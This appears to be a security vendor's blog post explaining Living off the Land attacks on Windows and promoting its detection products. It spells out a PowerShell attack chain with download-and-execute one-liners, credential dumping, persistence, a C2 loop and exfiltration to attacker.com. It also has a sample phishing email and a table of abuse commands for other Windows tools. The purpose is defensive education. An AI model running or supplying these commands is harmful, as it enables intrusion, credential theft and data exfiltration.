Living off the Land (LOTL) Attacks: How Adversaries Weaponize Your Own Systems (and How to Stop Them)

Living off the Land (LOTL) Attacks: How Adversaries Weaponize Your Own Systems (and How to Stop Them)

The cybersecurity field is too occupied with Gen AI and its potential misuse in launching cyberattacks. However, there is another quiet threat that most organizations are unaware of or underestimate, the living off-the-land cyberattack.

A short explanation on Living off the Land Cyberattack

It's a technique in which adversaries exploit an organization's tools, which they use to carry out their daily work and weaponize them to launch a cyberattack.

What tools do they exploit?

Adversaries exploit legitimate Windows tools like PowerShell, WMI, WMIC, Bitsadmin, Certutil, Rundll32, Regex, Reg.exe, Regedit, Mshta.exe, Cscript, Wscript, Schtasks, Netsh, Net.exe, Net1.exe, Cmd.exe, Mavinject.exe, InstallUtil.exe, Dllhost.exe, PresentationHost.exe, MSBuild.exe, Conhost.exe, and Pcalua.exe.  

With the help of these Windows tools, the adversary quietly escalates their privileges, moves laterally within the systems, exfiltrates data, and maintains a long-term persistence.

What makes this lethal?

EDR, antivirus, and firewalls often fail to detect malicious activities because adversaries are not using any malware; instead, they are using the tools already in the system, which everyone trusts.

During the SolarWinds supply chain attack in 2020, adversaries used PowerShell and WMI to move laterally within the systems and blend with legitimate admin activities.

Let’s take PowerShell, one of the most exploited tools in living-off-the-land attacks, to explain how these Windows tools are exploited in real-time.    

Demonstration of How Adversaries Abuse PowerShell in Living off the Land Attack

First, a quick note on how System Administrators use PowerShell within an organization to give you a context of its dependency:

PowerShell is used for:

  • Automating repetitive tasks like creating new users, making system backups, installing new software, and generating reports.
  • Configuring system settings, managing services, updating registry values, and changing network settings.
  • Managing multiple computers across the network.
  • Installing or removing software across endpoints, running Windows updates, and deploying security patches.

What makes PowerShell so dangerous when it is in the hands of an adversary?

Firstly, PowerShell is present in all Windows systems. It’s scriptable and can be easily automated with complex logic. PowerShell can run code without writing to disk and blends well with administrative activity. It also integrates with AD, WMI, .NET, and WinRM.

Now, let’s look into how an adversary will exploit this tool.

Step 1: To Gain Initial Access to the system  

This phishing email is for educational purposes only.

Employee Performance Evaluation Report
Urgent: Employee Performance Evaluation Report – Immediate Action Required

From: HR Department

To: Akshatdubey@Infopercept.com

Hi Akshat,

As part of our quarterly internal review process, we’ve compiled a preliminary performance evaluation summary for all staff. Your personalized report is attached to this email.

Please open the attached document and enable editing and macros to view your assessment. This is a confidential document intended only for you.

Please review and acknowledge the report by the end of the day today. It will be forwarded to your department head by tomorrow morning.

If you have any questions, feel free to contact us directly.

Regards,

Vidhi Raval
Human Resources | Infopercept Pvt Ltd.

✉️ Vidhi.Raval@Infopercept.com

☎️ +91-22-5555-XXXX

📎 Attachment: Performance_Evaluation_Q2.docm

The unsuspecting employee opens it, which triggers the macro to run the PowerShell command.

Here is an example:

PowerShell Command 
Powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"

PowerShell allows downloading and executing malicious code in-memory (fileless). It also avoids disk-based antivirus detection.

Step 2: Mapping All the Assets

Since PowerShell provides integration with the operating system and activity directory—it’s ideal for mapping assets.

In the next stage, the adversary gathers information about the system and network without raising any suspicion. They pass the following commands in PowerShell to map all the assets.

PowerShell Command 
Get-Process
Get-NetIPAddress
Get-WmiObject Win32_ComputerSystem
Get-ADUser -Filter *

Step 3: Dumping Credentials

Once all the information is gathered, the adversary steals user credentials, allowing him to move laterally within the organization’s systems and networks. They use tools like Invoke—Mimikatz, which the adversary downloaded via PowerShell.

PowerShell Command 
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/invoke-mimikatz.ps1')
Invoke-Mimikatz

Step 4: Establishing Presence

To maintain a long-term presence within the systems if it's rebooted or logged out—the adversary schedules PowerShell to run at login with the following command automatically.

PowerShell Command 
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name
        "Updater" -Value "powershell -windowstyle hidden -executionpolicy bypass -file
C:\Users\Public\updater.ps1"

Step 5: Moving Laterally Within the Systems

 To laterally move within other systems in the network—they use PowerShell remoting and pass the following command, since it provides native support for remote execution via WinRM.

PowerShell Command 
Invoke-Command -ComputerName TARGET-PC -ScriptBlock { iex (New-Object
Net.WebClient).DownloadString('http://attacker.com/payload.ps1') }

Step 6: Gaining Control

As PowerShell runs periodically to fetch new instructions—the adversary exploits by passing the following command to maintain constant communication with their server.

PowerShell Command 
while ($true) {
try {
$cmd = Invoke-WebRequest "http://attacker.com/cmd.txt"
Invoke-Expression $cmd.Content
} catch {}
Start-Sleep -Seconds 60
}

,Step 7: Stealing Data and Disrupting the Entire Operation

Finally, as PowerShell handles archiving, encryption, and HTTP communication, the adversary passes the following command to steal the data and disrupt the entire operation.

PowerShell Command 
Compress-Archive -Path "C:\SensitiveData" -DestinationPath "C:\temp\data.zip"
        Invoke-WebRequest -Uri "http://attacker.com/upload" -Method POST -InFile
"C:\temp\data.zip"

But what about other tools? How can adversaries exploit them? While going over each of them will make this blog too long, the table below will give examples of how these tools are exploited.

Windows Tools Adversary Use Command Line
WMIC/WMI Remote Code Execution (RCE) via WMI. Executes malicious scripts remotely on the victim's machine as a fileless attack. 
wmic /node:"VictimPC" process call create "powershell-nop-w hidden -IEX(New-Object Net.WebClient).DownloadString['http://attacker.com/malware.ps1'])"
Bitsadmin Stealthy malware delivery. The adversary drops a Remote Access Trojan (RAT) silently. 
bitsadmin /transfer job /download /priority high http://evil.com/rat.exe C:\Users\Public\rat.exe
Certutil Download & Obfuscate Malware for evasion 
certutil -urlcache -split -f http://malicious.site/payload.exe payload.exe certutil -encode payload.exe payload.b64
Rundll32 Execute malware in-memory. It loads a malicious DLL file with no file drop. 
rundll32.exe malware.dll,InstallPayload
Schtasks Establish persistence. The scheduled tasks keep running the attackers' C2 beacon every 30 minutes. 
schtasks /create /tn "WinUpdate" /tr "powershell -w hidden -IEX(New-Object Net.WebClient).DownloadString['http://attacker.com/c2.ps1'])" /sc minute /mo 30
Cscript/Wscript Executes obfuscated malware. This malicious VB script connects to a CZ server. 
WScript payload.vbs
MSBuild Inline C# malware execution. It is hidden inside a csproj, in which malware runs in memory. 
<Project ToolsVersion="1.0"> <Target Name="Run"> <ClassExample.Execute /> </Target> </Project>
Net.exe/Netl.exe Perform reconnaissance and abuse privileges. This allows them to get information on users, groups, and shares. 
net user net group "Domain Admins" net view \\victim
Netsh Modify and disable the firewall to allow C2 traffic, and create a covert backdoor channel 
netsh firewall set opmode disable netsh advfirewall firewall add rule name="Backdoor" dir=in action=allow protocol=TCP localport=4444
Cmd.exe Run hidden malware chains, which execute it stealthily from the shell. 
cmd.exe /c "powershell -w hidden IEX(New-Object Net.WebClient).DownloadString('http://bad.com/shell.ps1')"
Mavinject.exe Code injection for the fileless attack. It injects malware into a trusted process like Explorer.exe 
mavinject.exe 4321/INJECTRUNNING C:\malicious\payload.dll
InstallUtil.exe Runs .NET-based malware with no console window. This executes backdoor code disguised as a NET installer. 
InstallUtil.exe MaliciousApp.exe
Dllhost.exe Persist within the system via DLL sideloading. 
dllhost.exe /Processid:(11111111-2222-3333-4444-555555555555)
PresentationHost.exe Executes .xbap file with embedded code. It loads a malicious GUI payload from the web. 
PresentationHost.exe http://attacker.com/dropper.xbap
Conhost.exe Evade detection by hiding the command shell origin. Whatever actions the adversary takes will look normal. 
Powershell.exe -WindowStyle Hidden -Command "IEX(New-Object Net.WebClient).DownloadString['http://attacker.com/shell.ps1']"
Pcalua.exe Launches arbitrary executables, which allows an adversary to deploy malware by bypassing application control. 
pcalua.exe -a "C:\Users\Public\payload.exe"

So, what can organizations do in such cases? To remedy this problem, they will need to identify how their Windows Native tools can be exploited by adversaries.
Also, they will need an EDR that comes with behavioral analysis, heuristics, telemetry correlation, and threat intelligence to detect suspicious activities even if the payload is fileless or obfuscated.

In short, to deal with Living off the Land (LOTL) Attacks, organizations will need a mixture of both offensive and defensive security.

Invinsense XDR has consolidated all the defensive cybersecurity solutions. These include SIEM, SOAR, EDR, Case Management, Threat Intelligence, and Threat Exchange. The AI/ML-enabled security lake allows these tools to coordinate with each other and share intelligence.

Whereas, Invinsense OXDR has consolidated all the offensive security tools. These include Breach and Attack Simulation, Vulnerability Management, RedOps, and Attacker’s Lens View.

Together, they will secure your organization from Living off the Land (LOTL) Attacks.

How?

As an example, let’s look into how Invinsense XDR detects and prevents PowerShell-based living off the land (LOTL) attack. Then, we will go through how Invinsense OXDR will strengthen your organization against such attacks.  

A Demonstration of How Invinsense XDR Detects and Responds to All Types of PowerShell-Based Attacks

1) To Prevent Initial Access through Phishing + PowerShell

Invinsense XDR Detection:

Macro spawning PowerShell is a highly suspicious parent-child process chain. The EDR component of Invinsense XDR will detect any PowerShell flag execution that has:

  • nop (No profile)
  • Whidden (Window Hidden)
  • IEX and Download String (common in fileless malware)

Invinsense XDR Response:

To deal with this threat, our platform will respond by:

  • Sending an alert or automatically blocking execution
  • Killing a malicious child process
  • Quarantining the document and isolating the endpoint  

2) To Stop Asset Mapping

Invinsense XDR Detection:

Invinsense XDR will flag enumeration commands like Get-WmiObject, Get-ADUser, and Get-NETIPADDRESS when run by unauthorized users or if it's outside of the IT automation context.
It will also detect abnormal PowerShell usage patterns by comparing against behavioral baselines.

Invinsense XDR Response:

  • Our platform will provide logs through the SIEM component for our SOC team to analyze.
  • Furthermore, Invinsense XDR will also prevent access to AD enumeration if triggered by unknown scripts.

3) Preventing Credential Dumping through Invoke-Mimikatz

Invinsense XDR Detection

Invinsense XDR continuously monitors for behaviors commonly associated with Mimikatz. It detects suspicious access to LSASS memory, the use of known credential dumping functions (e.g., Invoke-Mimikatz), and DLL injection patterns.

Invinsense XDR Response:

When such activity is identified, Invinsense XDR immediately blocks the credential theft attempt, generates a high-priority alert for the SOC team, and automatically isolates the affected host to prevent further compromise.

4) Rooting Out Persistence

Invinsense XDR Detection:

Invinsense XDR will detect any attempts to register modification under HCKU\...\Run with a suspicious value (PowerShell + Hidden). It will also constantly monitor persistence mechanisms like startup entries, scheduled tasks, and WMI subscriptions.

Invinsense XDR Response:

To stop this, Invinsense XDR will immediately send an alert to our SOC team, plus it will also roll back any registry changes and contain the threat.

5) Stopping Lateral Movement

Invinsense XDR Detection: 

Invinsense XDR will detect any invoke command or WinRM usage from the compromised host. It will proceed to flag cross-system PowerShell remoting and unusual lateral behavior.

Invinsense XDR Response:

To remediate this issue, our platform will send an alert to our SOC team while blocking the entire process. It will also provide an attack graph showing lateral spread attempts.

6) C2Beacon Loop

Invinsense XDR Detection:

Any beacon-like PowerShell activity, in which HTTP GETs to the same remote host, or there is use of loops (while ($true)) and dynamic command execution(Invoke-Expression) gets flagged by Invinsense XDR. It will also flag any behavioral anomaly based on the frequency and content of web requests.

Invinsense XDR Response:

Invinsense XDR will proceed by killing the beacon process, blocking outbound communication, and alerting our SOC team on a potential C2 channel.

7) Data Exfiltration & Impact

Invinsense XDR Detection:

Invinsense XDR detects compression of large directories and exfiltration attempts via HTTP Post using PowerShell. The file movement + compression + external upload sequence is highly anomalous.  

Invinsense XDR Response:

Invinsense XDR will send an alert to our SOC team, while also blocking web upload. It will correlate with prior command history to surface a full kill chain.

How Invinsense XDR Handles Other LOLBIN Abuse

LOLBin Tool Invinsense XDR Detection and Response Mechanism
bitsadmin Flags as deprecated and suspicious when used for downloads
certutil Detects malware download + base64 encoding/decoding patterns
rundll32 Monitors DLL load path + function invocation anomalies
schtasks Flags malicious scheduled task creation with PowerShell
MSBuild Flags inline C# in .csproj and suspicious build behavior
installutil Detects abnormal install behaviors or child process generation
conhost, cmd Monitors command chaining, window hiding, and suspicious parents
mavinject Flags remote process injection into trusted processes like explorer.exe
netsh Detects firewall disabling + rule creation suspicious to EDR baselines
pcalua Alerts on use by non-interactive or unknown parent processes

Alongside EDR, what organizations need to do for securing themselves against Living off the Land (LOTL) attacks is identify all the exposures within the Windows tools. That’s where offensive security comes into play.  

The following section will show you how Invinsense OXDR works to identify exposures within your organization’s native Windows Tools.

Invinsense OXDR, With Its Vulnerability Management, Maps Out the Entire Attack Surface of Your Windows Native Tools

Through Invinsense OXDR’s vulnerability management, organizations will gain insights into which Windows tools are used in all their endpoints and how accessible they are to users. This will shed light on the execution policy of these tools, their system configuration, monitoring and logging gaps, historical and behavior baselines, and privilege and misuse opportunities.  

1)   Tool Availability and Accessibility

 “Can these tools be executed? From where? By whom?”

  • Execution Context: Whether these tools are available to standard users or admins only  
  • Path Exposure: Is it in the PATH or directories? Is it Writable by users

2)   Execution Policy & System Configuration

 “What prevents or allows the use of this tool?”

  • Script execution policy: (for PowerShell, WScript, CScript, etc.)
  • AppLocker / WDAC rules: Are these tools restricted by policies?
  • Group Policy settings: Allowing execution of scheduled tasks, registry edits
  • UAC bypass potential: Tools like eventvwr.exe, fodhelper.exe

3)   Monitoring & Logging Gaps

“If the tool is used maliciously, would it be visible?”

  • Sysmon coverage: Are process creations, parent-child chains logged?
  • Script block logging: Enabled for PowerShell/HTA?
  • Command-line logging: Enabled via Windows Event ID 4688?
  • ETW visibility: Can tools that inject into memory (e.g., rundll32.exe) be traced?

4)   Historical & Behavioral Baselines

“Has this tool been abused before? Is its use normal on this system?”

  • Frequency of use per tool per endpoint/user
  • Usage deviation from normal behavior (e.g., reg.exe used by the HR team?)
  • Abuse patterns: Prior simulations, red team activity, or incidents involving this tool

5)   Privilege Misuse Opportunities

“Can a low-privileged user use this tool to escalate or pivot?”

  • Writable registry locations for persistence via reg.exe
  • Task scheduling without elevated rights
  • Abusing services like InstallUtil.exe to run .NET payloads
  • Access to certutil.exe or bitsadmin.exe for download/exfiltration

Based on the insights gained from Invinsense OXDR’s vulnerability management, this table shows the exposed attack surface of Windows-native tools that adversaries can exploit in Living off the Land (LOTL)attacks.

Tools Available (Y/N) Execution Context Policy Blocked Logged Prior Use Misuse Risk
certutil.exe Yes Standard User No No Rare High
schtasks.exe Yes Standard User No Partial Common Medium
rundll32.exe Yes All Users No No Common High
mshta.exe Yes Standard User No No Rare High
powershell.exe Yes All Users Partial (Depends on script policy) Yes (if logging is enabled) Frequent Very High
reg.exe Yes Standard User No Partial Occasional Medium
installutil.exe Yes All Users No No Rare High
wscript.exe Yes Standard User No No Occasional High

Now, Gartner in 2022 came up with CTEM, which stands for continuous threat exposure management. It’s a cybersecurity framework that advocates that instead of trying to remediate all exposures at the same time, organizations should focus on prioritizing the ones that are highly exploitable and frequently targeted by adversaries.

Invinsense OXDR follows the CTEM approach. It will focus on those Windows Tools first that have a higher risk of misuse. Based on the above table, PowerShell is currently very high on the risk scale. So, in the next stage, it will run simulations through BAS and RedOps on PowerShell first.

Invinsense OXDR Through Adversarial Exposure Validation Performs the Following Simulation on the PowerShell Windows Tool To Find Exposures in It

The table below shows the realistic, controlled PowerShell-based simulations performed by BAS/RedOps, which are part of adversarial exposure validation. These simulations align with adversary behavior and MITRE ATT&CK techniques.

PowerShell Simulation Scenarios Performed By BAS and RedOps

Simulation Name Description Example Command/Action MITRE Technique Purpose/Outcome
Download and Execute Payload Simulate fetching and executing remote payloads IEX(New-Object Net.WebClient).DownloadString('http://redteam.local/payload.ps1') T1059.001, T1105 Test detection of script-based delivery
In-Memory Payload Execution Use in-memory tools like Mimikatz or Reflective DLL injection Invoke-Mimikatz or Invoke-ReflectivePEInjection T1055, T1003 Assess AV/EDR detection of memory-based attacks
AMSI Bypass Attempt Attempt to disable PowerShell's anti-malware scanning interface [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')... T1562.001 Validate the detection of AMSI evasion techniques
PowerShell UAC Bypass Abuse Windows UAC auto-elevating binaries via PowerShell Launch fodhelper or eventvwr from PS to elevate T1548.002 Simulate privilege escalation via native LOLBins
Remote PS Session (Lateral Movement) Use PowerShell Remoting to access other systems Enter-PSSession -ComputerName target -Credential domain\user T1021.006 Test visibility into lateral movement
Encoded Command Execution Obfuscate payloads using Base64 encoded PowerShell commands powershell.exe -EncodedCommand base64 T1027, T1140 Evaluate detection of obfuscated script delivery
Registry Persistence Modify autorun keys via PowerShell to achieve persistence Set-ItemProperty -Path HKCU:\Software\...\Run -Name MyApp -Value "malicious.exe" T1547.001 Check if registry-based persistence is detected/logged
Living off the Land Scripts (LOBS) Blend malicious actions into normal script activity Use Invoke-WebRequest, Start-Process, etc. with stealth T1059.001, T1204.002 Test stealthiness of common admin-like attacker behaviors

Once the BAS and RedOps simulations are done, Invinsense OXDR will present a list of exposures present in the PowerShell.

List of Exposures Identified After PowerShell Simulation

Exposure Category Example Exposure Related Simulation Risk
Unrestricted Script Execution PowerShell runs scripts with no execution policy restrictions (e.g., Unrestricted, Bypass) Download and Execute, Obfuscated Command High
Missing Script Block Logging Lack of deep script block or transcription logging -> attacker actions go undetected All simulations High
AMSI Evasion Unmonitored AMSI bypass techniques are not detected or logged AMSI Bypass High
Credential Dumping Exposure Memory injection via PowerShell allowed -> tools like Invoke-Mimikatz succeed In-Memory Execution Credential Dumping
Privilege Escalation via UAC UAC bypass techniques (e.g., fodhelper) succeed without alert or control PowerShell UAC Bypass High
Lateral Movement Visibility Gaps PowerShell Remoting is not restricted by network segmentation or flagged by detection tools PS Remoting Medium-High
Lack of Obfuscation Detection Base64-encoded or obfuscated commands bypass security tooling Encoded Command Execution High
Registry Modification Unmonitored PowerShell can alter registry keys (e.g., for persistence) with no alerts triggered Registry Persistence Medium-High
LOLBins Behavior Not Baseline-Trained Scripts using Invoke-WebRequest, Start-Process, etc. are not correlated against normal baselines Living off the Land Scripts Medium
No AppLocker or WDAC Controls PowerShell is allowed to run in full language mode across all users All simulations High

Our Purple and Security Engineering Remediation team will proceed to remediate these exposures by:

  • Turning on Constrained Language Mode
  • Enforcing Script Block Logging, Module Logging
  • Applying Application Control (AppLocker/WDAC)
  • Monitoring AMSI Bypass techniques
  • Limiting PS Remoting to known admin hosts
  • Establishing Baseline usage of tools like Invoke-WebRequest, Start-Process

CTEM is a cyclical process and should be performed continuously. Once your organization has remediated all its exposures in the PowerShell, it should proceed with performing CTEM through Invinsense OXDR on other Windows Tools and remediate exposures within them. In the long run, this will make your organization more resilient to Living off the Land (LOTL) Attacks.

Home > Blogs